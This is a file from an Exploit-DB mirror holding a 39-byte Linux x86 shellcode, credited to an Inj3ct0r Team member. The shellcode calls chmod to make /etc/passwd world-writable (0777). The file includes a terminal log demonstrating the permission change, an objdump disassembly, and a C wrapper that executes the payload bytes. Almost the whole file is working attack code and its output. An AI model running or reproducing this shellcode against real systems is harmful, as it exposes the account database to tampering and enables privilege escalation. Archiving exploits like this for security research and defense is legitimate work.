bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/13725.c
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

83 lines
No EOL
3.6 KiB
C
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm gunslinger_ member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
Title : change mode 0777 of "/etc/passwd" with sys_chmod syscall
Name : 39 bytes sys_chmod("/etc/passwd",599) x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
/*
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# gcc -o chmod chmod.c
chmod.c: In function main:
chmod.c:37: warning: incompatible implicit declaration of built-in function strlen
root@localhost:/home/gunslinger/shellcode# ./chmod
Length: 39
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# chmod 644 /etc/passwd
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# objdump -d chmod
chmod: file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
8048060: eb 15 jmp 0x8048077
8048062: 31 c0 xor %eax,%eax
8048064: b0 0f mov $0xf,%al
8048066: 5b pop %ebx
8048067: 31 c9 xor %ecx,%ecx
8048069: 66 b9 ff 01 mov $0x1ff,%cx
804806d: cd 80 int $0x80
804806f: 31 c0 xor %eax,%eax
8048071: b0 01 mov $0x1,%al
8048073: 31 db xor %ebx,%ebx
8048075: cd 80 int $0x80
8048077: e8 e6 ff ff ff call 0x8048062
804807c: 2f das
804807d: 65 gs
804807e: 74 63 je 0x80480e3
8048080: 2f das
8048081: 70 61 jo 0x80480e4
8048083: 73 73 jae 0x80480f8
8048085: 77 64 ja 0x80480eb
root@localhost:/home/gunslinger/shellcode#
*/
#include <stdio.h>
char sc[] = "\xeb\x15\x31\xc0\xb0\x0f\x5b\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(sc));
(*(void(*)()) sc)();
return 0;
}
Reference in a new issue View git blame Copy permalink